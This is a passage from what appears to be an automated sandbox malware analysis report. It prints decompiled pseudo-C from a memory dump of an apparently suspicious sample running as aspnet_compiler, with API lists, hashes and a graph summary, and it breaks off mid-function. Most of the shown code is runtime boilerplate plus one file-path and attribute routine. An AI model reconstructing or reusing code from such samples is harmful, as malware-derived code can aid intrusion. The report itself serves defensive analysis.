                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9669c23f4861f424a89e7b8ff4685c7ad96e6594ae57ef6ca9720756efc6abdf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E10001000(void* __ebx, intOrPtr __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                  				short _v524;
                                                                                                                                                                                                                                                                  				void* __edi;
                                                                                                                                                                                                                                                                  				signed char _t30;
                                                                                                                                                                                                                                                                  				signed int _t37;
                                                                                                                                                                                                                                                                  				short _t46;
                                                                                                                                                                                                                                                                  				intOrPtr _t64;
                                                                                                                                                                                                                                                                  				WCHAR* _t65;
                                                                                                                                                                                                                                                                  				void* _t67;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t65 = __edx;
                                                                                                                                                                                                                                                                  				_t64 = __ecx;
                                                                                                                                                                                                                                                                  				_t30 = E10002C40(__ecx,  &_v524, 0, 0x208);
                                                                                                                                                                                                                                                                  				if(_a16 != 1) {
                                                                                                                                                                                                                                                                  					if(_a16 == 2) {
                                                                                                                                                                                                                                                                  						_t30 = E10001E16(_a8, lstrlenW(_a8));
                                                                                                                                                                                                                                                                  						if(_t30 != 0) {
                                                                                                                                                                                                                                                                  							E10001E89( &_v524, _t65, _a4);
                                                                                                                                                                                                                                                                  							return E100011EA(_t64,  &_v524);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					lstrcatW( &_v524, _t65);
                                                                                                                                                                                                                                                                  					_t37 = lstrlenW( &_v524);
                                                                                                                                                                                                                                                                  					_t46 = 0x5c;
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)(_t67 + _t37 * 2 - 0x20a)) != _t46) {
                                                                                                                                                                                                                                                                  						 *((short*)(_t67 + lstrlenW( &_v524) * 2 - 0x208)) = _t46;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					E10001E89( &(( &_v524)[lstrlenW( &_v524)]), _a4, _a12);
                                                                                                                                                                                                                                                                  					_t30 = GetFileAttributesW( &_v524);
                                                                                                                                                                                                                                                                  					if(_t30 != 0xffffffff && (_t30 & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                  						return E1000173A(_t64,  &_v524);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t30;
                                                                                                                                                                                                                                                                  			}











                                                                                                                                                                                                                                                                  0x10001019
                                                                                                                                                                                                                                                                  0x1000101b
                                                                                                                                                                                                                                                                  0x1000101d
                                                                                                                                                                                                                                                                  0x10001029
                                                                                                                                                                                                                                                                  0x100010b3
                                                                                                                                                                                                                                                                  0x100010c5
                                                                                                                                                                                                                                                                  0x100010cd
                                                                                                                                                                                                                                                                  0x100010da
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x100010e8
                                                                                                                                                                                                                                                                  0x100010cd
                                                                                                                                                                                                                                                                  0x1000102f
                                                                                                                                                                                                                                                                  0x10001038
                                                                                                                                                                                                                                                                  0x1000104b
                                                                                                                                                                                                                                                                  0x1000104f
                                                                                                                                                                                                                                                                  0x10001058
                                                                                                                                                                                                                                                                  0x10001063
                                                                                                                                                                                                                                                                  0x10001063
                                                                                                                                                                                                                                                                  0x10001083
                                                                                                                                                                                                                                                                  0x10001090
                                                                                                                                                                                                                                                                  0x1000109a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x100010a8
                                                                                                                                                                                                                                                                  0x1000109a
                                                                                                                                                                                                                                                                  0x100010f0

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3594823470-0
                                                                                                                                                                                                                                                                  • Opcode ID: ae3d68afd0a1e8b8eaf82146cd2f01f854cd5a27cdfaceb71c3d914fde37089b
                                                                                                                                                                                                                                                                  • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae3d68afd0a1e8b8eaf82146cd2f01f854cd5a27cdfaceb71c3d914fde37089b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                                                                                                                                  			E10003856(void* __ecx) {
                                                                                                                                                                                                                                                                  				void* _t4;
                                                                                                                                                                                                                                                                  				void* _t11;
                                                                                                                                                                                                                                                                  				void* _t16;
                                                                                                                                                                                                                                                                  				long _t25;
                                                                                                                                                                                                                                                                  				void* _t28;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				if( *0x10013020 != 0xffffffff) {
                                                                                                                                                                                                                                                                  					_t25 = GetLastError();
                                                                                                                                                                                                                                                                  					_t11 = E10003B67(__eflags,  *0x10013020);
                                                                                                                                                                                                                                                                  					__eflags = _t11 - 0xffffffff;
                                                                                                                                                                                                                                                                  					if(_t11 == 0xffffffff) {
                                                                                                                                                                                                                                                                  						L5:
                                                                                                                                                                                                                                                                  						_t11 = 0;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						__eflags = _t11;
                                                                                                                                                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                                                                                                                                                  							_t4 = E10003BA2(__eflags,  *0x10013020, 0xffffffff);
                                                                                                                                                                                                                                                                  							_pop(_t16);
                                                                                                                                                                                                                                                                  							__eflags = _t4;
                                                                                                                                                                                                                                                                  							if(_t4 != 0) {
                                                                                                                                                                                                                                                                  								_push(0x28);
                                                                                                                                                                                                                                                                  								_push(1);
                                                                                                                                                                                                                                                                  								_t28 = E100055EB(_t16);
                                                                                                                                                                                                                                                                  								__eflags = _t28;
                                                                                                                                                                                                                                                                  								if(__eflags == 0) {
                                                                                                                                                                                                                                                                  									L8:
                                                                                                                                                                                                                                                                  									_t11 = 0;
                                                                                                                                                                                                                                                                  									E10003BA2(__eflags,  *0x10013020, 0);
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									__eflags = E10003BA2(__eflags,  *0x10013020, _t28);
                                                                                                                                                                                                                                                                  									if(__eflags != 0) {
                                                                                                                                                                                                                                                                  										_t11 = _t28;
                                                                                                                                                                                                                                                                  										_t28 = 0;
                                                                                                                                                                                                                                                                  										__eflags = 0;
                                                                                                                                                                                                                                                                  									} else {
                                                                                                                                                                                                                                                                  										goto L8;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								L100047F0(_t28);
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								goto L5;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					SetLastError(_t25);
                                                                                                                                                                                                                                                                  					return _t11;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					return 0;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}








                                                                                                                                                                                                                                                                  0x1000385d
                                                                                                                                                                                                                                                                  0x10003870
                                                                                                                                                                                                                                                                  0x10003877
                                                                                                                                                                                                                                                                  0x1000387a
                                                                                                                                                                                                                                                                  0x1000387d
                                                                                                                                                                                                                                                                  0x10003896
                                                                                                                                                                                                                                                                  0x10003896
                                                                                                                                                                                                                                                                  0x1000387f
                                                                                                                                                                                                                                                                  0x1000387f
                                                                                                                                                                                                                                                                  0x10003881
                                                                                                                                                                                                                                                                  0x1000388b
                                                                                                                                                                                                                                                                  0x10003891
                                                                                                                                                                                                                                                                  0x10003892
                                                                                                                                                                                                                                                                  0x10003894
                                                                                                                                                                                                                                                                  0x1000389b
                                                                                                                                                                                                                                                                  0x1000389d
                                                                                                                                                                                                                                                                  0x100038a4
                                                                                                                                                                                                                                                                  0x100038a8
                                                                                                                                                                                                                                                                  0x100038aa
                                                                                                                                                                                                                                                                  0x100038be
                                                                                                                                                                                                                                                                  0x100038be
                                                                                                                                                                                                                                                                  0x100038c7
                                                                                                                                                                                                                                                                  0x100038ac
                                                                                                                                                                                                                                                                  0x100038ba
                                                                                                                                                                                                                                                                  0x100038bc
                                                                                                                                                                                                                                                                  0x100038d0
                                                                                                                                                                                                                                                                  0x100038d2
                                                                                                                                                                                                                                                                  0x100038d2
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x100038bc
                                                                                                                                                                                                                                                                  0x100038d5
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10003894
                                                                                                                                                                                                                                                                  0x10003881
                                                                                                                                                                                                                                                                  0x100038dd
                                                                                                                                                                                                                                                                  0x100038e7
                                                                                                                                                                                                                                                                  0x1000385f
                                                                                                                                                                                                                                                                  0x10003861
                                                                                                                                                                                                                                                                  0x10003861

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                  • Opcode ID: a902ed10457fba181b5afa2793b10df0902bf9e95a929cd681ef76589f72277b
                                                                                                                                                                                                                                                                  • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a902ed10457fba181b5afa2793b10df0902bf9e95a929cd681ef76589f72277b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                                                                                                                  			E10005AF6(void* __ebx, void* __ecx, void* __edx) {
                                                                                                                                                                                                                                                                  				void* __edi;
                                                                                                                                                                                                                                                                  				void* __esi;
                                                                                                                                                                                                                                                                  				intOrPtr _t2;
                                                                                                                                                                                                                                                                  				void* _t3;
                                                                                                                                                                                                                                                                  				void* _t4;
                                                                                                                                                                                                                                                                  				intOrPtr _t9;
                                                                                                                                                                                                                                                                  				void* _t11;
                                                                                                                                                                                                                                                                  				void* _t20;
                                                                                                                                                                                                                                                                  				void* _t21;
                                                                                                                                                                                                                                                                  				void* _t23;
                                                                                                                                                                                                                                                                  				void* _t25;
                                                                                                                                                                                                                                                                  				void* _t27;
                                                                                                                                                                                                                                                                  				void* _t29;
                                                                                                                                                                                                                                                                  				void* _t31;
                                                                                                                                                                                                                                                                  				void* _t32;
                                                                                                                                                                                                                                                                  				long _t36;
                                                                                                                                                                                                                                                                  				long _t37;
                                                                                                                                                                                                                                                                  				void* _t40;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t29 = __edx;
                                                                                                                                                                                                                                                                  				_t23 = __ecx;
                                                                                                                                                                                                                                                                  				_t20 = __ebx;
                                                                                                                                                                                                                                                                  				_t36 = GetLastError();
                                                                                                                                                                                                                                                                  				_t2 =  *0x10013044; // 0x9
                                                                                                                                                                                                                                                                  				_t42 = _t2 - 0xffffffff;
                                                                                                                                                                                                                                                                  				if(_t2 == 0xffffffff) {
                                                                                                                                                                                                                                                                  					L2:
                                                                                                                                                                                                                                                                  					_t3 = E1000637B(_t23, 1, 0x364);
                                                                                                                                                                                                                                                                  					_t31 = _t3;
                                                                                                                                                                                                                                                                  					_pop(_t25);
                                                                                                                                                                                                                                                                  					if(_t31 != 0) {
                                                                                                                                                                                                                                                                  						_t4 = E10005E5E(_t25, _t36, __eflags,  *0x10013044, _t31);
                                                                                                                                                                                                                                                                  						__eflags = _t4;
                                                                                                                                                                                                                                                                  						if(_t4 != 0) {
                                                                                                                                                                                                                                                                  							E1000593C(_t25, _t31, 0x100141b0);
                                                                                                                                                                                                                                                                  							E1000571E(0);
                                                                                                                                                                                                                                                                  							_t40 = _t40 + 0xc;
                                                                                                                                                                                                                                                                  							__eflags = _t31;
                                                                                                                                                                                                                                                                  							if(_t31 == 0) {
                                                                                                                                                                                                                                                                  								goto L9;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								goto L8;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_push(_t31);
                                                                                                                                                                                                                                                                  							goto L4;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						_push(_t3);
                                                                                                                                                                                                                                                                  						L4:
                                                                                                                                                                                                                                                                  						E1000571E();
                                                                                                                                                                                                                                                                  						_pop(_t25);
                                                                                                                                                                                                                                                                  						L9:
                                                                                                                                                                                                                                                                  						SetLastError(_t36);
                                                                                                                                                                                                                                                                  						E100055A8(_t20, _t29, _t31, _t36);
                                                                                                                                                                                                                                                                  						asm("int3");
                                                                                                                                                                                                                                                                  						_push(_t20);
                                                                                                                                                                                                                                                                  						_push(_t36);
                                                                                                                                                                                                                                                                  						_push(_t31);
                                                                                                                                                                                                                                                                  						_t37 = GetLastError();
                                                                                                                                                                                                                                                                  						_t21 = 0;
                                                                                                                                                                                                                                                                  						_t9 =  *0x10013044; // 0x9
                                                                                                                                                                                                                                                                  						_t45 = _t9 - 0xffffffff;
                                                                                                                                                                                                                                                                  						if(_t9 == 0xffffffff) {
                                                                                                                                                                                                                                                                  							L12:
                                                                                                                                                                                                                                                                  							_t32 = E1000637B(_t25, 1, 0x364);
                                                                                                                                                                                                                                                                  							_pop(_t27);
                                                                                                                                                                                                                                                                  							if(_t32 != 0) {
                                                                                                                                                                                                                                                                  								_t11 = E10005E5E(_t27, _t37, __eflags,  *0x10013044, _t32);
                                                                                                                                                                                                                                                                  								__eflags = _t11;
                                                                                                                                                                                                                                                                  								if(_t11 != 0) {
                                                                                                                                                                                                                                                                  									E1000593C(_t27, _t32, 0x100141b0);
                                                                                                                                                                                                                                                                  									E1000571E(_t21);
                                                                                                                                                                                                                                                                  									__eflags = _t32;
                                                                                                                                                                                                                                                                  									if(_t32 != 0) {
                                                                                                                                                                                                                                                                  										goto L19;
                                                                                                                                                                                                                                                                  									} else {
                                                                                                                                                                                                                                                                  										goto L18;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									_push(_t32);
                                                                                                                                                                                                                                                                  									goto L14;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								_push(_t21);
                                                                                                                                                                                                                                                                  								L14:
                                                                                                                                                                                                                                                                  								E1000571E();
                                                                                                                                                                                                                                                                  								L18:
                                                                                                                                                                                                                                                                  								SetLastError(_t37);
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_t32 = E10005E08(_t25, _t37, _t45, _t9);
                                                                                                                                                                                                                                                                  							if(_t32 != 0) {
                                                                                                                                                                                                                                                                  								L19:
                                                                                                                                                                                                                                                                  								SetLastError(_t37);
                                                                                                                                                                                                                                                                  								_t21 = _t32;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								goto L12;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						return _t21;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_t31 = E10005E08(_t23, _t36, _t42, _t2);
                                                                                                                                                                                                                                                                  					if(_t31 != 0) {
                                                                                                                                                                                                                                                                  						L8:
                                                                                                                                                                                                                                                                  						SetLastError(_t36);
                                                                                                                                                                                                                                                                  						return _t31;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						goto L2;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}





















                                                                                                                                                                                                                                                                  0x10005af6
                                                                                                                                                                                                                                                                  0x10005af6
                                                                                                                                                                                                                                                                  0x10005af6
                                                                                                                                                                                                                                                                  0x10005b00
                                                                                                                                                                                                                                                                  0x10005b02
                                                                                                                                                                                                                                                                  0x10005b07
                                                                                                                                                                                                                                                                  0x10005b0a
                                                                                                                                                                                                                                                                  0x10005b18
                                                                                                                                                                                                                                                                  0x10005b1f
                                                                                                                                                                                                                                                                  0x10005b24
                                                                                                                                                                                                                                                                  0x10005b27
                                                                                                                                                                                                                                                                  0x10005b2a
                                                                                                                                                                                                                                                                  0x10005b3c
                                                                                                                                                                                                                                                                  0x10005b41
                                                                                                                                                                                                                                                                  0x10005b43
                                                                                                                                                                                                                                                                  0x10005b4e
                                                                                                                                                                                                                                                                  0x10005b55
                                                                                                                                                                                                                                                                  0x10005b5a
                                                                                                                                                                                                                                                                  0x10005b5d
                                                                                                                                                                                                                                                                  0x10005b5f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10005b45
                                                                                                                                                                                                                                                                  0x10005b45
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10005b45
                                                                                                                                                                                                                                                                  0x10005b2c
                                                                                                                                                                                                                                                                  0x10005b2c
                                                                                                                                                                                                                                                                  0x10005b2d
                                                                                                                                                                                                                                                                  0x10005b2d
                                                                                                                                                                                                                                                                  0x10005b32
                                                                                                                                                                                                                                                                  0x10005b6d
                                                                                                                                                                                                                                                                  0x10005b6e
                                                                                                                                                                                                                                                                  0x10005b74
                                                                                                                                                                                                                                                                  0x10005b79
                                                                                                                                                                                                                                                                  0x10005b7c
                                                                                                                                                                                                                                                                  0x10005b7d
                                                                                                                                                                                                                                                                  0x10005b7e
                                                                                                                                                                                                                                                                  0x10005b85
                                                                                                                                                                                                                                                                  0x10005b87
                                                                                                                                                                                                                                                                  0x10005b89
                                                                                                                                                                                                                                                                  0x10005b8e
                                                                                                                                                                                                                                                                  0x10005b91
                                                                                                                                                                                                                                                                  0x10005b9f
                                                                                                                                                                                                                                                                  0x10005bab
                                                                                                                                                                                                                                                                  0x10005bae
                                                                                                                                                                                                                                                                  0x10005bb1
                                                                                                                                                                                                                                                                  0x10005bc3
                                                                                                                                                                                                                                                                  0x10005bc8
                                                                                                                                                                                                                                                                  0x10005bca
                                                                                                                                                                                                                                                                  0x10005bd5
                                                                                                                                                                                                                                                                  0x10005bdb
                                                                                                                                                                                                                                                                  0x10005be3
                                                                                                                                                                                                                                                                  0x10005be5
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10005bcc
                                                                                                                                                                                                                                                                  0x10005bcc
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10005bcc
                                                                                                                                                                                                                                                                  0x10005bb3
                                                                                                                                                                                                                                                                  0x10005bb3
                                                                                                                                                                                                                                                                  0x10005bb4
                                                                                                                                                                                                                                                                  0x10005bb4
                                                                                                                                                                                                                                                                  0x10005be7
                                                                                                                                                                                                                                                                  0x10005be8
                                                                                                                                                                                                                                                                  0x10005be8
                                                                                                                                                                                                                                                                  0x10005b93
                                                                                                                                                                                                                                                                  0x10005b99
                                                                                                                                                                                                                                                                  0x10005b9d
                                                                                                                                                                                                                                                                  0x10005bf0
                                                                                                                                                                                                                                                                  0x10005bf1
                                                                                                                                                                                                                                                                  0x10005bf7
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10005b9d
                                                                                                                                                                                                                                                                  0x10005bfe
                                                                                                                                                                                                                                                                  0x10005bfe
                                                                                                                                                                                                                                                                  0x10005b0c
                                                                                                                                                                                                                                                                  0x10005b12
                                                                                                                                                                                                                                                                  0x10005b16
                                                                                                                                                                                                                                                                  0x10005b61
                                                                                                                                                                                                                                                                  0x10005b62
                                                                                                                                                                                                                                                                  0x10005b6c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10005b16

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10005B2D
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10005B55
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                                                                                                                  • _abort.LIBCMT ref: 10005B74
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                  • Opcode ID: 280dcc78ecc6faa9d2670cfae4a8297d64d786f8c305a07bbc27acd822032bb1
                                                                                                                                                                                                                                                                  • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 280dcc78ecc6faa9d2670cfae4a8297d64d786f8c305a07bbc27acd822032bb1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 451 10003370-100033b5 call 10003330 call 100037a7 456 10003416-10003419 451->456 457 100033b7-100033c9 451->457 458 10003439-10003442 456->458 459 1000341b-10003428 call 10003790 456->459 457->458 460 100033cb 457->460 465 1000342d-10003436 call 10003330 459->465 462 100033d0-100033e7 460->462 463 100033e9-100033f7 call 10003740 462->463 464 100033fd 462->464 472 100033f9 463->472 473 1000340d-10003414 463->473 467 10003400-10003405 464->467 465->458 467->462 470 10003407-10003409 467->470 470->458 474 1000340b 470->474 475 10003443-1000344c 472->475 476 100033fb 472->476 473->465 474->465 477 10003486-10003496 call 10003774 475->477 478 1000344e-10003455 475->478 476->467 483 10003498-100034a7 call 10003790 477->483 484 100034aa-100034c6 call 10003330 call 10003758 477->484 478->477 479 10003457-10003466 478->479 487 10003483 479->487 488 10003468-10003480 479->488 483->484 487->477 488->487
                                                                                                                                                                                                                                                                  C-Code - Quality: 42%
                                                                                                                                                                                                                                                                  			E10003370(void* __ebx, void* __edi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                  				char _v5;
                                                                                                                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                                                                                                                  				char _v16;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                                                                                                                                  				char _v32;
                                                                                                                                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                                                                                                                                  				void* __esi;
                                                                                                                                                                                                                                                                  				char _t51;
                                                                                                                                                                                                                                                                  				signed int _t58;
                                                                                                                                                                                                                                                                  				intOrPtr _t59;
                                                                                                                                                                                                                                                                  				void* _t60;
                                                                                                                                                                                                                                                                  				intOrPtr* _t61;
                                                                                                                                                                                                                                                                  				intOrPtr _t63;
                                                                                                                                                                                                                                                                  				intOrPtr* _t65;
                                                                                                                                                                                                                                                                  				intOrPtr _t71;
                                                                                                                                                                                                                                                                  				intOrPtr _t73;
                                                                                                                                                                                                                                                                  				signed int _t75;
                                                                                                                                                                                                                                                                  				char _t77;
                                                                                                                                                                                                                                                                  				intOrPtr _t90;
                                                                                                                                                                                                                                                                  				intOrPtr _t93;
                                                                                                                                                                                                                                                                  				intOrPtr* _t95;
                                                                                                                                                                                                                                                                  				intOrPtr* _t97;
                                                                                                                                                                                                                                                                  				void* _t98;
                                                                                                                                                                                                                                                                  				void* _t101;
                                                                                                                                                                                                                                                                  				void* _t102;
                                                                                                                                                                                                                                                                  				void* _t110;
